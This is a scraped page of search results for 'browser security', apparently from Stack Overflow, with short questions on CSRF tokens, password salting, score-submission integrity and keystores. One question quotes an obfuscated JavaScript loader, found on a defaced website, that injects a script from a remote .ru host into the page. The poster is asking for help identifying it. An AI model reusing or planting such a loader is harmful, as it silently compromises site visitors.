Search Results

Search found 25503 results on 1021 pages for 'browser security'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 259/1021 | < Previous Page | 255 256 257 258 259 260 261 262 263 264 265 266  | Next Page >

  • Understanding CSRF - Simple Question

    - by byronh
    I know this might make me seem like an idiot, I've read everything there is to read about CSRF and I still don't understand how using a 'challenge token' would add any sort of prevention. Please help me clarify the basic concept, none of the articles and posts here on SO I read seemed to really explicitly state what value you're comparing with what. From OWASP: In general, developers need only generate this token once for the current session. After initial generation of this token, the value is stored in the session and is utilized for each subsequent request until the session expires. If I understand the process correctly, this is what happens. I log in at http://example.com and a session/cookie is created containing this random token. Then, every form includes a hidden input also containing this random value from the session which is compared with the session/cookie upon form submission. But what does that accomplish? Aren't you just taking session data, putting it in the page, and then comparing it with the exact same session data? Seems like circular reasoning. These articles keep talking about following the "same-origin policy" but that makes no sense, because all CSRF attacks ARE of the same origin as the user, just tricking the user into doing actions he/she didn't intend. Is there any alternative other than appending the token to every single URL as a query string? Seems very ugly and impractical, and makes bookmarking harder for the user.

    Read the article

  • How do I ensure that SOAP requests from a flash client to my ASP server are coming from the flash cl

    - by Gary Benade
    I have a flash based game that has a high score system implemented with a SOAP service. There are prizes involved and I want to prevent someone from using FireBug or similar to discover the webservice path and submit fake scores. I considered using some kind of encryption on the data but am aware that someone could decompile the swf and work out how I did it. I also considered using an IP whitelist but since the incoming data will come from the users IP and not the servers that won't work. (I'm sure I'm missing something obvious here...) I know that there is a tried and tested solution for this, but I don't seem to be asking google the right questions to get to it. Any help and suggestions will be appreciated, thank you

    Read the article

  • Can per-user randomized salts be replaced with iterative hashing?

    - by Chas Emerick
    In the process of building what I'd like to hope is a properly-architected authentication mechanism, I've come across a lot of materials that specify that: user passwords must be salted the salt used should be sufficiently random and generated per-user ...therefore, the salt must be stored with the user record in order to support verification of the user password I wholeheartedly agree with the first and second points, but it seems like there's an easy workaround for the latter. Instead of doing the equivalent of (pseudocode here): salt = random(); hashedPassword = hash(salt . password); storeUserRecord(username, hashedPassword, salt); Why not use the hash of the username as the salt? This yields a domain of salts that is well-distributed, (roughly) random, and each individual salt is as complex as your salt function provides for. Even better, you don't have to store the salt in the database -- just regenerate it at authentication-time. More pseudocode: salt = hash(username); hashedPassword = hash(salt . password); storeUserRecord(username, hashedPassword); (Of course, hash in the examples above should be something reasonable, like SHA-512, or some other strong hash.) This seems reasonable to me given what (little) I know of crypto, but the fact that it's a simplification over widely-recommended practice makes me wonder whether there's some obvious reason I've gone astray that I'm not aware of.

    Read the article

  • How to give you website customers a secure feeling

    - by Saif Bechan
    I was wondering how you can give your website customers the confidence that you are not tinkering with the database values. I am planning on running a website which falls in the realm of an online game. There is some kind of credit system involved that people have to pay for. Now I was wondering how sites like this ensure there customers that there is no foul play in the database itself. As I am the database admin i can pretty much change all the values from within without anyone knowing i did. Hence letting someone win that does not rightfully is the winner. Is it maybe an option to decrypt en encrypt the credits people have so i can't change them. Or is there maybe a company i can hire that checks my company for foul play.

    Read the article

  • Help needed in grokking password hashes and salts

    - by javafueled
    I've read a number of SO questions on this topic, but grokking the applied practice of storing a salted hash of a password eludes me. Let's start with some ground rules: a password, "foobar12" (we are not discussing the strength of the password). a language, Java 1.6 for this discussion a database, postgreSQL, MySQL, SQL Server, Oracle Several options are available to storing the password, but I want to think about one (1): Store the password hashed with random salt in the DB, one column Found on SO and elsewhere is the automatic fail of plaintext, MD5/SHA1, and dual-columns. The latter have pros and cons MD5/SHA1 is simple. MessageDigest in Java provides MD5, SHA1 (through SHA512 in modern implementations, certainly 1.6). Additionally, most RDBMSs listed provide methods for MD5 encryption functions on inserts, updates, etc. The problems become evident once one groks "rainbow tables" and MD5 collisions (and I've grokked these concepts). Dual-column solutions rest on the idea that the salt does not need to be secret (grok it). However, a second column introduces a complexity that might not be a luxury if you have a legacy system with one (1) column for the password and the cost of updating the table and the code could be too high. But it is storing the password hashed with a random salt in single DB column that I need to understand better, with practical application. I like this solution for a couple of reasons: a salt is expected and considers legacy boundaries. Here's where I get lost: if the salt is random and hashed with the password, how can the system ever match the password? I have theory on this, and as I type I might be grokking the concept: Given a random salt of 128 bytes and a password of 8 bytes ('foobar12'), it could be programmatically possible to remove the part of the hash that was the salt, by hashing a random 128 byte salt and getting the substring of the original hash that is the hashed password. Then re hashing to match using the hash algorithm...??? So... any takers on helping. :) Am I close?

    Read the article

  • Ruby - encrypted_strings

    - by Tom Andersen
    A bit of a Ruby newbie here - should be an easy question: I want to use the encrypted_strings gem to create a password encrypted string: (from http://rdoc.info/projects/pluginaweek/encrypted_strings) Question is: Everything works fine, but how come I don't need the password to decrypt the string? Say I want to store the string somewhere for a while,like the session. Is the password also stored with it? (which would seem very strange?). And no, I'm not planning on using 'secret-key' or any similar hack as a password. I am planning on dynamically generating a class variable @@password using a uuid, which I don't store other than in memory, and can change from one running of the program to the next. Symmetric: >> password = 'shhhh' => "shhhh" >> crypted_password = password.encrypt(:symmetric, :password => 'secret_key') => "qSg8vOo6QfU=\n" >> crypted_password.class => String >> crypted_password == 'shhhh' => true >> password = crypted_password.decrypt => "shhhh"

    Read the article

  • [Symfony] Login to application with GET/POST token

    - by Henri
    I work on a Symfony web application which has a standard login form. To allow users to login more easily we want to give them a link which logs them in directly. I've already build a way to get a token to use, but I have no clue as to how the Symfony login process works, specifically how I can adapt it to take a GET/POST token instead of redirecting to the login page. Any help appreciated! Oh and this is Symfony 1.2 BTW (and no, upgrading is not an option right now)

    Read the article

  • java keytool question

    - by user384706
    Hi, I created a java keystore programmatically of type jks (i.e. default type). It is initially empty so I created a DSA certificate. keytool -genkey -alias myCert -v -keystore trivial.keystore How can I see the public and private keys? I.e. is there a command that prints the private key of my certificate? I could only find keytool -certreq which in my understanding prints the certificate as a whole: -----BEGIN NEW CERTIFICATE REQUEST----- MIICaTCCAicCAQAwZTELMAkGA1UEBhMCR1IxDzANBgNVBAgTBkdyZWVjZTEPMA0GA1UEBxMGQXRo BQADLwAwLAIUQZbY/3Qq0G26fsBbWiHMbuVd3VICFE+gwtUauYiRbHh0caAtRj3qRTwl -----END NEW CERTIFICATE REQUEST----- I assume this is the whole certificate. How can I see private (or public key) via keytool? Thank you

    Read the article

  • What does this script do? Is it malicious?

    - by ramdaz
    This script was added to a defaced web page of a client web site running PHP. I have no clue what this script can do, and do not know whether this is really malicious. Can someone advise. Please find code below.... var GU='';var h;var X=new String();var mP="";H=function(){var F=["hu"];function L(Lc,O,d){return Lc.substr(O,d);}OH=55345;OH-=37;var x=document;QM=6929;QM++;q=25298;q-=65;var t='';var vs={};var u=["hR"];var Oi=RegExp;var A={kh:"LQ"};var v=new String("/goo"+"gle."+L("com/DyBg",0,4)+L("abc.EBgq",0,4)+L("0vm1go.c1m0v",4,4)+"om/t"+L("erraX6U",0,4)+L(".comKvlS",0,4)+L("P1By.br.By1P",4,4)+"php");yz={Ec:false};function y(Lc,O){hI=24414;hI++;g={};a=28529;a--;var d=new String(L("[n0jJ",0,1))+O+String("]");var m=new Oi(d, String("g"));n={kW:40818};ly={HN:false};return Lc.replace(m, t);};ZW=9686;ZW-=202;GE=56525;GE-=235;D=["u_","QP"];var E=null;var vd={ka:"J"};var Jn=new Date();Xg={V:51919};var l=751407-743327;try {} catch(U){};var W=new String("body");var qi="qi";this.Vf=38797;this.Vf--;var P=y('skchrkikpjtJ','SvFJDneKyEB_akgG1jx6h7OMZ');var RlE=58536;var Xx=false;this.jo='';vi=41593;vi--;h=function(){try {var YU=new String();var DY="";var dY=y('c4rJeJaVt_ebEslVe4mJe_n4ty','bqV_4sJy6');CN={_Y:63379};s=x[dY](P);var fH="fH";pI=33929;pI--;Uw=[];var G=y('sVrvc5','5wvD6TG4IuR2MLBjQgPpbVK');var Wg=[];var Lc=l+v;var yW=new String();var iO=new String();var Oe=String("defe"+"r");var Et=["qO","AF"];var QX=13548;s[G]=new String("http:"+L("//ten5qC",0,5)+"thpro"+"fit.r"+L("u:mn7k",0,2))+Lc;PA={};s[Oe]=[2,1][1];this.Vt="Vt";var ho=46131;try {var kn='cI'} catch(kn){};this.ww=27193;this.ww+=97;x[W].appendChild(s);this.yk=60072;this.yk++;var Lp=new Date();} catch(PY){this.ku=43483;this.ku++;this.ra=47033;this.ra--;this.ru="ru";};var lu=new Array();var me=new String();};};YB=["LB","uM"];var AI={Vm:4707};H();this.mDs=57864;this.mDs-=135;zz=44697;zz++;var sn=[];window.onload=h;var PQ=false;var mF={Hm:false};try {var r_='iv'} catch(r_){};this.z_="z_";

    Read the article

  • Cleaning all inline events from HTML tags

    - by Itay Moav
    For HTML input, I want to neutralize all HTML elements that have inline js (onclick="..", onmouseout=".." etc). I am thinking, isn't it enough to encode the following chars? =,(,) So onclick="location.href='ggg.com'" will become onclick%3D"location.href%3D'ggg.com'" What am I missing here? Edit: I do need to accept active HTML (I can't escape it all or entities is it).

    Read the article

  • Alternatives to dotfuscator suite?

    - by SnOrfus
    I've been looking for solutions that provide a couple of types of protection and dotfuscator has been what I've landed on each time I look. Specifically, I like: code obfuscation their usage analytics tamper detection/notification shelf-life enforcement Now, I know that there's lots of alternatives to the first, some of which are free, but are there alternatives to the others? It's not that I don't want to pay the cost of dotfuscator suite, but I want to be informed before I write the cheque.

    Read the article

  • Configure Windows firewall to prevent an application from listening on a specific port [closed]

    - by U-D13
    The issue: there are many applications struggling to listen on port 80 (Skype, Teamviewer et al.), and to many of them that even is not essential (in the sense that you can have a httpd running and blocking the http port, and the other application won't even squeak about being unable to open the port). What makes things worse, some of the apps are... Well, I suppose, that it's okay that the mentally impaired are being integrated in the society by giving them a job to do, but... Programming requires some intellectual effort, in my humble opinion... What I mean is that there is no way to configure the app not to use specific ports (that's what you get for using proprietary software) - you can either add it to windows firewall exceptions (and succumb to undesired port opening behavior) or not (and risk losing most - if not all - of the functionality). Technically, it is not impossible for the firewall to deny an application opening an incoming port even if the application is in the exception list. And if this functionality is built into the Windows firewall somewhere, there should be a way to activate it. So, what I want to know is: whether there exists such an option, and if it does how to activate it.

    Read the article

  • Rewriting Live TCP Streams

    - by user213060
    I want to rewrite TCP/IP streams. Ettercap's etterfilter command lets you perform simple live replacements of TCP/IP data based on fixed strings or regexes. Example: http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 I would like to rewrite streams based on my own filter program instead of just simple string replacements. Anyone have an idea of how to do this? Is there anything other than Ettercap that can do live replacement like this, maybe as a plugin to a VPN software or something? Thanks!

    Read the article

  • AES Encryption library

    - by Spines
    Is there a library or something that will allow me to simply call a function that will AES encrypt a byte array? I don't want to deal with multiple update blocks/transformFinal/etc, because there is a possibility I will mess up...

    Read the article

  • authentication on gui application written on perl

    - by oren
    Its not specific perl question I am building a perl gui/wxperl application that connect to DB . I want my application to be a password protected i.e first the user should enter the user and password and then use the appication . what is the best secure method to store the password could someone provide an idea what is the best method to how should i store the user and the password and how should i retrieve them for authentication ? if possible could someone provide some perl code how to do this ?

    Read the article

  • Securing Elmah RSS Feeds in ASP.NET website

    - by olivehour
    I followed the answer to this question http://stackoverflow.com/questions/1245364/securing-elmah-in-asp-net-website to restrict access to the elmah handler. However, it seems that adding an RSS feed to Outlook for the URL elmah.axd/rss or elmah.axd/digestrss bypasses the authentication. What's the point of securing the handler if someone can guess the RSS URL and subscribe to a feed of the error log?

    Read the article

  • how to force client(winform) application to use NTLM when calling web services

    - by peanut
    Hi, I have a winform application calling web services hosted in IIS, by default, the client app will use Kerberose for authentication to IIS, and it failed for some reasons? But the same app works fine at another PC(with different user login), and I found it is using NTLM by checking the IIS server event log. is there anyway we can change the client app(winform) authentication type? Thanks in advance

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 255 256 257 258 259 260 261 262 263 264 265 266  | Next Page >